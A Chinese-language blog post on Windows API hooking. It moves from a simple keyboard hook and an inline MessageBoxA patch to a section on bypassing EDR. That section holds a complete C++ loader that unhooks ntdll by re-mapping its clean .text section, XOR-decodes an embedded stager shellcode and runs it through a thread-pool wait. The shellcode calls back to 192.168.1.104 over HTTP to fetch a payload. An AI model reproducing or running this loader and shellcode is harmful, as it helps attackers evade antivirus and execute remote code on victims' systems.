Windows API hook技术

Windows API hook技术

A.什么叫挂钩?

钩子技术即指“给特定的函数挂上钩子,让函数在执行前先执行被挂的钩子”,从而达到拦截事件和函数调用的目的。挂钩子的本质是一个程序段。

为了方便理解我们先首先实现一个简单的keyborad挂钩

hookDLL.cpp

// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"
#include <string>
#include <Windows.h>
#include <iostream>
#include <fstream>
using namespace std;
BOOL APIENTRY DllMain( HMODULE hModule,
                       DWORD  ul_reason_for_call,
                       LPVOID lpReserved
                     )
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam)

LRESULT CALLBACK KeyboardProc(int code, WPARAM wParam, LPARAM lParam) {
    ofstream text;
    text.open("c:\\programdata\\hook.txt");
    text << "HOOK";
    text.close();
    return CallNextHookEx(NULL, code, wParam, lParam);
}

  hookexe.cpp

// installhook.cpp : 此文件包含 "main" 函数。程序执行将在此处开始并结束。
//

#include <iostream>

#include <windows.h>
#include <strsafe.h>

int main()
{
    HOOKPROC keybords;
    static HINSTANCE hookdll;
    hookdll = LoadLibrary(TEXT("C:\\Users\\localhost\\Desktop\\hook\\keyboradProcHook\\x64\\Release\\keyboradProcHook.dll"));
    keybords = (HOOKPROC)GetProcAddress(hookdll, "KeyboardProc");
    static HHOOK hhook;
    hhook = SetWindowsHookEx(
        WH_KEYBOARD_LL,
        keybords,
        hookdll,
        0);
    std::cout << "Hello World!\n";
    
}

B通过HookedMessageBox 进一步了解hook技术

这里是https://www.ired.team/offensive-security/code-injection-process-injection/how-to-hook-windows-api-using-c++源代码

#include "pch.h"
#include <iostream>
#include <Windows.h>

FARPROC messageBoxAddress = NULL;
SIZE_T bytesWritten = 0;
char messageBoxOriginalBytes[6] = {};

int __stdcall HookedMessageBox(HWND hWnd, LPCSTR lpText, LPCSTR lpCaption, UINT uType) {

	// print intercepted values from the MessageBoxA function
	std::cout << "Ohai from the hooked function\n";
	std::cout << "Text: " << (LPCSTR)lpText << "\nCaption: " << (LPCSTR)lpCaption << std::endl;

	// unpatch MessageBoxA
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, messageBoxOriginalBytes, sizeof(messageBoxOriginalBytes), &bytesWritten);

	// call the original MessageBoxA
	return MessageBoxA(NULL, lpText, lpCaption, uType);
}

int main()
{
	// show messagebox before hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	HINSTANCE library = LoadLibraryA("user32.dll");
	SIZE_T bytesRead = 0;

	// get address of the MessageBox function in memory
	messageBoxAddress = GetProcAddress(library, "MessageBoxA");

	// save the first 6 bytes of the original MessageBoxA function - will need for unhooking
	ReadProcessMemory(GetCurrentProcess(), messageBoxAddress, messageBoxOriginalBytes, 6, &bytesRead);

	// create a patch "push <address of new MessageBoxA); ret"
	void* hookedMessageBoxAddress = &HookedMessageBox;
	char patch[6] = { 0 };
	memcpy_s(patch, 1, "\x68", 1);
	memcpy_s(patch + 1, 4, &hookedMessageBoxAddress, 4);
	memcpy_s(patch + 5, 1, "\xC3", 1);

	// patch the MessageBoxA
	WriteProcessMemory(GetCurrentProcess(), (LPVOID)messageBoxAddress, patch, sizeof(patch), &bytesWritten);

	// show messagebox after hooking
	MessageBoxA(NULL, "hi", "hi", MB_OK);

	return 0;
}

  通过disam反汇编发现,确实再第二次调用MessgeboxA的时候执行了我们的函数

Windows API hook技术

 

 

 

我们尝试分析hook过程

messgbox函数存在于用户层user32.dll中,所以我们先从user32.dll中找到MessgboxA的地址

Windows API hook技术

 

 

 然后读取当前进程的内存空间中的MessgeBoxA的地址的前6位字节用来后面unhook的时候使用

Windows API hook技术

 

 

 然后就是存放修改自身内存的指令

push ret

Windows API hook技术

 

 

 然后就是修改内存空间,

Windows API hook技术

 

 

 这是修改后的messgbox

 

 

 Windows API hook技术

 

 

 进入HookedMessageBox后

 

 

 

 Windows API hook技术

 

 

 C通过杀软特性实战bypass EDR

一般来说ntdll就是连接用户与内核层的最后一道防线,很多杀软在进行拦截是都是hook ntdll里面的一些函数,讨论的情况是如何bypass他

一幅图简单明了

Windows API hook技术

 

 

 前提是ntdll已经被hook了 当然如果没hook最好(:

#include <iostream>
#include <Windows.h>
#include <winternl.h>
#include <psapi.h>
#include <stdio.h>
/* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
unsigned char buf[] = "\xfd\xe9\x88\x1\x1\x1\x61\x88\xe4\x30\xd3\x65\x8a\x53\x31\x8a\x53\xd\x8a\x53\x15\x8a\x73\x29\xe\xb6\x4b\x27\x30\xfe\x30\xc1\xad\x3d\x60\x7d\x3\x2d\x21\xc0\xce\xc\x0\xc6\xe3\xf1\x53\x56\x8a\x53\x11\x8a\x43\x3d\x0\xd1\x8a\x41\x79\x84\xc1\x75\x4b\x0\xd1\x51\x8a\x49\x19\x8a\x59\x21\x0\xd2\xe2\x3d\x48\x8a\x35\x8a\x0\xd7\x30\xfe\x30\xc1\xad\xc0\xce\xc\x0\xc6\x39\xe1\x74\xf5\x2\x7c\xf9\x3a\x7c\x25\x74\xe3\x59\x8a\x59\x25\x0\xd2\x67\x8a\xd\x4a\x8a\x59\x1d\x0\xd2\x8a\x5\x8a\x0\xd1\x88\x45\x25\x25\x5a\x5a\x60\x58\x5b\x50\xfe\xe1\x59\x5e\x5b\x8a\x13\xea\x87\x5c\x69\x6f\x64\x75\x1\x69\x76\x68\x6f\x68\x55\x69\x4d\x76\x27\x6\xfe\xd4\x30\xfe\x56\x56\x56\x56\x56\x69\x3b\x57\x78\xa6\xfe\xd4\xe8\x85\x1\x1\x1\x5a\x30\xc8\x50\x50\x6b\x2\x50\x50\x69\x51\x1\x1\x1\x52\x51\x69\x56\x88\x9e\xc7\xfe\xd4\xea\x71\x5a\x30\xd3\x53\x69\x1\x3\x41\x85\x53\x53\x53\x52\x53\x51\x69\xea\x54\x2f\x3a\xfe\xd4\x88\xc7\x82\xc2\x51\x30\xfe\x56\x56\x6b\xfe\x52\x57\x69\x2c\x7\x19\x7a\xfe\xd4\x84\xc1\xe\x85\xc2\x0\x1\x1\x30\xfe\x84\xf7\x75\x5\x88\xf8\xea\x8\x69\xab\xc4\xe3\x5c\xfe\xd4\x88\xc0\x69\x44\x20\x5f\x30\xfe\xd4\x30\xfe\x56\x6b\x6\x50\x57\x51\x69\xb6\x56\xe1\xa\xfe\xd4\xbe\x1\x2e\x1\x1\x38\xc6\x75\xb6\x30\xfe\xe8\x90\x0\x1\x1\xe8\xc8\x0\x1\x1\xe9\x8a\xfe\xfe\xfe\x2e\x65\x42\x51\x64\x1\xb2\x9c\xe6\x19\xb4\x91\xc2\xb5\xcd\x2e\x69\xe0\x59\xff\x31\x34\x41\x11\x33\x29\xbf\x57\x97\x5\x33\x45\x36\xdd\x84\x9a\xb5\x58\xc0\xbb\xcf\xfb\x14\xd9\x12\xe2\x17\x95\xfc\x6b\xe1\x81\xc1\xc9\x10\xbe\x80\x91\x67\xe7\xea\xa7\x4e\x94\x8\xb5\x6c\x27\x18\x68\xcb\xc0\xe9\x7d\x89\xf4\x3e\xda\x39\x1\x54\x72\x64\x73\x2c\x40\x66\x64\x6f\x75\x3b\x21\x4c\x6e\x7b\x68\x6d\x6d\x60\x2e\x34\x2f\x31\x21\x29\x62\x6e\x6c\x71\x60\x75\x68\x63\x6d\x64\x3a\x21\x4c\x52\x48\x44\x21\x38\x2f\x31\x3a\x21\x56\x68\x6f\x65\x6e\x76\x72\x21\x4f\x55\x21\x37\x2f\x30\x3a\x21\x56\x4e\x56\x37\x35\x3a\x21\x55\x73\x68\x65\x64\x6f\x75\x2e\x34\x2f\x31\x3a\x21\x43\x4e\x48\x44\x38\x3a\x44\x4f\x54\x52\x28\xc\xb\x1\x27\xa5\xe\x77\x5d\xbf\xd5\x23\xda\x5c\xbe\xb1\x4\x19\xd1\x95\x42\xc6\xcf\x5e\x81\x95\x69\xb4\x46\xc3\xde\x28\xe4\x2d\x72\xb7\xfa\x85\x7c\x41\xdc\xac\xe\xc3\x71\x9b\x6f\xa5\xde\x65\x2e\xa0\x34\xfb\xca\x53\xb0\x87\x81\x8a\x52\x64\xff\x77\x9a\x1c\xf2\x34\xf4\xe9\xfd\xf3\xda\x9a\xf2\x8\x3d\x6f\x24\xd1\x5b\x2d\x9a\xe2\xf3\xb\x5b\xe5\x0\xad\xbd\x3a\x8a\xbc\x28\x5f\xf0\x4c\xf2\x13\xc\x4f\x3b\xaa\x2e\x1d\x97\x4\x78\x39\x1e\x7f\x96\x9\x14\xe4\x14\xfc\x25\x0\x32\x4c\x4e\x38\x22\x9\x45\xcf\x92\x28\x9a\xa4\xef\x25\xb6\xe8\x2d\x8c\xa9\xd3\xa6\x2d\x88\x85\xb\xd4\xca\xcd\x26\xb\x34\xaf\x5d\x47\xe1\xbb\x52\x2f\x82\xfc\xdb\xfd\xfd\xa9\xd6\xda\x71\x9f\xdf\xab\xec\x60\x6b\x7b\xd4\xde\xf4\x7\x9e\xf4\x2e\x10\x56\x6f\xa6\x62\x2f\x36\x52\x31\x97\xd4\xca\xbb\x61\x84\x26\x64\x2d\x78\xa2\x36\x4e\xae\x66\x14\xe\x90\xab\x7b\x1\x69\xf1\xb4\xa3\x57\xfe\xd4\x6b\x41\x69\x1\x11\x1\x1\x69\x1\x1\x41\x1\x56\x69\x59\xa5\x52\xe4\xfe\xd4\x92\xb8\x1\x1\x1\x1\x0\xd8\x50\x52\x88\xe6\x56\x69\x1\x21\x1\x1\x52\x57\x69\x13\x97\x88\xe3\xfe\xd4\x84\xc1\x75\xc7\x8a\x6\x0\xc2\x84\xc1\x74\xe4\x59\xc2\xe9\xa8\xfc\xfe\xfe\x30\x38\x33\x2f\x30\x37\x39\x2f\x30\x2f\x30\x31\x35\x1\x13\x35\x57\x79";
void unhook() {
	HANDLE process = GetCurrentProcess();
	MODULEINFO mi = {};
	HMODULE ntdllModule = GetModuleHandleA("ntdll.dll");

	GetModuleInformation(process, ntdllModule, &mi, sizeof(mi));
	LPVOID ntdllBase = (LPVOID)mi.lpBaseOfDll;
	HANDLE ntdllFile = CreateFileA("c:\\windows\\system32\\ntdll.dll", GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
	HANDLE ntdllMapping = CreateFileMapping(ntdllFile, NULL, PAGE_READONLY | SEC_IMAGE, 0, 0, NULL);
	LPVOID ntdllMappingAddress = MapViewOfFile(ntdllMapping, FILE_MAP_READ, 0, 0, 0);

	PIMAGE_DOS_HEADER hookedDosHeader = (PIMAGE_DOS_HEADER)ntdllBase;
	PIMAGE_NT_HEADERS hookedNtHeader = (PIMAGE_NT_HEADERS)((DWORD_PTR)ntdllBase + hookedDosHeader->e_lfanew);

	for (WORD i = 0; i < hookedNtHeader->FileHeader.NumberOfSections; i++) {
		PIMAGE_SECTION_HEADER hookedSectionHeader = (PIMAGE_SECTION_HEADER)((DWORD_PTR)IMAGE_FIRST_SECTION(hookedNtHeader) + ((DWORD_PTR)IMAGE_SIZEOF_SECTION_HEADER * i));

		if (!strcmp((char*)hookedSectionHeader->Name, (char*)".text")) {
			DWORD oldProtection = 0;
			bool isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, PAGE_EXECUTE_READWRITE, &oldProtection);
			memcpy((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), (LPVOID)((DWORD_PTR)ntdllMappingAddress + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize);
			isProtected = VirtualProtect((LPVOID)((DWORD_PTR)ntdllBase + (DWORD_PTR)hookedSectionHeader->VirtualAddress), hookedSectionHeader->Misc.VirtualSize, oldProtection, &oldProtection);
		}
	}

	CloseHandle(process);
	CloseHandle(ntdllFile);
	CloseHandle(ntdllMapping);
	FreeLibrary(ntdllModule);

}
int main()
{
	unhook();
		int password = 1025;
	unsigned char deShellCode[1000];
	int nLen = sizeof(buf) - 1;
		for (int i = 0; i < nLen; i++)
	{
		deShellCode[i] = buf[i] ^ password;
		printf("\\x%x", deShellCode[i]);
	}

	HANDLE event = CreateEvent(NULL, FALSE, TRUE, NULL);
	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(deShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
	unhook();
	RtlMoveMemory(shellcodeAddress, deShellCode, sizeof(deShellCode));

	PTP_WAIT threadPoolWait = CreateThreadpoolWait((PTP_WAIT_CALLBACK)shellcodeAddress, NULL, NULL);
	SetThreadpoolWait(threadPoolWait, event, NULL);
	WaitForSingleObject(event, INFINITE);

	return 0;
}
//#include <stdio.h>
//#include <Windows.h>
//
///* length: 798 bytes */
//unsigned char buf[] = "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x6e\x65\x74\x00\x68\x77\x69\x6e\x69\x54\x68\x4c\x77\x26\x07\xff\xd5\x31\xff\x57\x57\x57\x57\x57\x68\x3a\x56\x79\xa7\xff\xd5\xe9\x84\x00\x00\x00\x5b\x31\xc9\x51\x51\x6a\x03\x51\x51\x68\x50\x00\x00\x00\x53\x50\x68\x57\x89\x9f\xc6\xff\xd5\xeb\x70\x5b\x31\xd2\x52\x68\x00\x02\x40\x84\x52\x52\x52\x53\x52\x50\x68\xeb\x55\x2e\x3b\xff\xd5\x89\xc6\x83\xc3\x50\x31\xff\x57\x57\x6a\xff\x53\x56\x68\x2d\x06\x18\x7b\xff\xd5\x85\xc0\x0f\x84\xc3\x01\x00\x00\x31\xff\x85\xf6\x74\x04\x89\xf9\xeb\x09\x68\xaa\xc5\xe2\x5d\xff\xd5\x89\xc1\x68\x45\x21\x5e\x31\xff\xd5\x31\xff\x57\x6a\x07\x51\x56\x50\x68\xb7\x57\xe0\x0b\xff\xd5\xbf\x00\x2f\x00\x00\x39\xc7\x74\xb7\x31\xff\xe9\x91\x01\x00\x00\xe9\xc9\x01\x00\x00\xe8\x8b\xff\xff\xff\x2f\x64\x43\x50\x65\x00\xb3\x9d\xe7\x18\xb5\x90\xc3\xb4\xcc\x2f\x68\xe1\x58\xfe\x30\x35\x40\x10\x32\x28\xbe\x56\x96\x04\x32\x44\x37\xdc\x85\x9b\xb4\x59\xc1\xba\xce\xfa\x15\xd8\x13\xe3\x16\x94\xfd\x6a\xe0\x80\xc0\xc8\x11\xbf\x81\x90\x66\xe6\xeb\xa6\x4f\x95\x09\xb4\x6d\x26\x19\x69\xca\xc1\xe8\x7c\x88\xf5\x3f\xdb\x38\x00\x55\x73\x65\x72\x2d\x41\x67\x65\x6e\x74\x3a\x20\x4d\x6f\x7a\x69\x6c\x6c\x61\x2f\x35\x2e\x30\x20\x28\x63\x6f\x6d\x70\x61\x74\x69\x62\x6c\x65\x3b\x20\x4d\x53\x49\x45\x20\x39\x2e\x30\x3b\x20\x57\x69\x6e\x64\x6f\x77\x73\x20\x4e\x54\x20\x36\x2e\x31\x3b\x20\x57\x4f\x57\x36\x34\x3b\x20\x54\x72\x69\x64\x65\x6e\x74\x2f\x35\x2e\x30\x3b\x20\x42\x4f\x49\x45\x39\x3b\x45\x4e\x55\x53\x29\x0d\x0a\x00\x26\xa4\x0f\x76\x5c\xbe\xd4\x22\xdb\x5d\xbf\xb0\x05\x18\xd0\x94\x43\xc7\xce\x5f\x80\x94\x68\xb5\x47\xc2\xdf\x29\xe5\x2c\x73\xb6\xfb\x84\x7d\x40\xdd\xad\x0f\xc2\x70\x9a\x6e\xa4\xdf\x64\x2f\xa1\x35\xfa\xcb\x52\xb1\x86\x80\x8b\x53\x65\xfe\x76\x9b\x1d\xf3\x35\xf5\xe8\xfc\xf2\xdb\x9b\xf3\x09\x3c\x6e\x25\xd0\x5a\x2c\x9b\xe3\xf2\x0a\x5a\xe4\x01\xac\xbc\x3b\x8b\xbd\x29\x5e\xf1\x4d\xf3\x12\x0d\x4e\x3a\xab\x2f\x1c\x96\x05\x79\x38\x1f\x7e\x97\x08\x15\xe5\x15\xfd\x24\x01\x33\x4d\x4f\x39\x23\x08\x44\xce\x93\x29\x9b\xa5\xee\x24\xb7\xe9\x2c\x8d\xa8\xd2\xa7\x2c\x89\x84\x0a\xd5\xcb\xcc\x27\x0a\x35\xae\x5c\x46\xe0\xba\x53\x2e\x83\xfd\xda\xfc\xfc\xa8\xd7\xdb\x70\x9e\xde\xaa\xed\x61\x6a\x7a\xd5\xdf\xf5\x06\x9f\xf5\x2f\x11\x57\x6e\xa7\x63\x2e\x37\x53\x30\x96\xd5\xcb\xba\x60\x85\x27\x65\x2c\x79\xa3\x37\x4f\xaf\x67\x15\x0f\x91\xaa\x7a\x00\x68\xf0\xb5\xa2\x56\xff\xd5\x6a\x40\x68\x00\x10\x00\x00\x68\x00\x00\x40\x00\x57\x68\x58\xa4\x53\xe5\xff\xd5\x93\xb9\x00\x00\x00\x00\x01\xd9\x51\x53\x89\xe7\x57\x68\x00\x20\x00\x00\x53\x56\x68\x12\x96\x89\xe2\xff\xd5\x85\xc0\x74\xc6\x8b\x07\x01\xc3\x85\xc0\x75\xe5\x58\xc3\xe8\xa9\xfd\xff\xff\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x31\x30\x34\x00\x12\x34\x56\x78";
//
//
//int main(int argc, char* argv[])
//{
//	int password = 1025;
//	unsigned char enShellCode[1000];
//	unsigned char deShellCode[1000];
//	int nLen = sizeof(buf) - 1;
//
//	for (int i = 0; i < nLen; i++)
//	{
//		enShellCode[i] = buf[i] ^ password;
//		printf("\\x%x", enShellCode[i]);
//	}
//
//	printf("\n");
//
//	/*for (int i = 0; i < nLen; i++)
//	{
//		deShellCode[i] = enShellCode[i] ^ password;
//		printf("\\x%x", deShellCode[i]);
//	}*/
//
//	system("pause");
//	return 0;
//}

D总结

当然 这次这是提到了一种unhook的手法,还有很多种比如 https://github.com/CylanceVulnResearch/ReflectiveDLLRefresher以及ACGhttps://www.countercraftsec.com/blog/post/arbitrary-vs-kernel/

也可以直接调用syscall来不与api交互,当然这些都是玩烂了的手法。只是体力活而已

参考

https://xz.aliyun.com/t/9166#toc-5
https://www.cnblogs.com/LyShark/p/13033722.html
https://improsec.com/tech-blog/user-mode-api-hooks-and-bypasses
https://www.ired.team/offensive-security/code-injection-process-injection/shellcode-execution-via-createthreadpoolwait
https://www.ired.team/offensive-security/defense-evasion/how-to-unhook-a-dll-using-c++
https://www.ired.team/offensive-security/defense-evasion/acg-arbitrary-code-guard-processdynamiccodepolicy
https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/
https://www.ired.team/offensive-security/defense-evasion/bypassing-cylance-and-other-avs-edrs-by-unhooking-windows-apis

 

Windows API hook技术

上一篇:Photoshop设计制作华丽的金色蛇型2013生肖字


下一篇:photoshop 简单制作一幅梦幻的风景写意画